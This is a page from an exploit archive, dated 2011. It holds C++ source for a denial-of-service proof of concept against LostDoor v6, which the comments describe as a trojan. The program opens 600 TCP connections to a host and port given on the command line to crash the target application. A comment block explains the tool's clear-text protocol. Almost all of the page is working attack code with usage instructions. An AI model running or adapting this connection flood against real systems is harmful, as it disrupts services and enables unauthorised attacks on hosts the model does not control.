LostDoor v6 Remote Denial Of Service



EKU-ID: 348 CVE: OSVDB-ID:
Author: Kevin R.V Published: 2011-05-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*  LostDoor v6 Remote Denial Of Service
*  Author: Kevin R.V <kevin.nullbyte@gmail.com>
*    Date: 2011
* License: Totally free 8-)
*
*
* Some information:
*
*
* The protocol used by LastDoor v6 is a simply clear text protocol with a delimitter, thats a normal packet to connect
* v1ct1m[\AS/]My Host[\AS/] Windows XP Professional[\AS/]testing-a6ae13b[\AS/]2:30:36[\AS/]Spain[\AS/][\AS/]511,48
* The application split by [\AS/] to get the different paramaters sended by victim
* That exploit code simply try to connect 600 TCP sockets, and the trojan get closed by showing an Automated error message because a programming error.
*
* The exploit have 2 random effects:
* 1 - computer get freezed, and application get closed automatically in some seconds
* 2 - Automated error message and application get close in some seconds
* */

#include <iostream>
#include <winsock2.h>

#define VERS "0.1"

int   connected;
using namespace std;


int PoC(char * host, unsigned int port)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock[600];
    struct sockaddr_in  local[600];
    for(int i = 0; i<600; i++)
    {
sock[i]=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
local[i].sin_family = AF_INET;
local[i].sin_addr.s_addr = inet_addr(host);
local[i].sin_port = htons(port);
if (connect(sock[i], (struct sockaddr *)&local[i], sizeof(local) ) == 0 )
{
connected = 1;
cout << ".";
}
else
{
if ( connected )
{
cout << endl << endl << "[+] Congrats LostDoor crashed!" << endl;
break;
}
else
cout << endl << endl << "[-] Sorry not LostDoor detected :(" << endl;
}
}
}
int main(int argc, char *argv[])

{
cout << "LostDoor v6 Denial Of Service " VERS << endl << endl;
cout << "by Kevin R.V <kevin.nullbyte@gmail.com" << endl;
if ( argc < 2 )
{
cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port>" << endl << endl;
exit(-1);
}

u_short port;
char * ip;

for(int i = 0; i<argc; i++)
{
if( ! strcmp(argv[i], "-h") != 0 )
ip = argv[i+1];
else if( ! strcmp(argv[i], "-p") != 0 )
port = atoi(argv[i+1]);
}

cout << "[+] Starting exploit" << endl << endl;
PoC(ip, port);


return 1;
}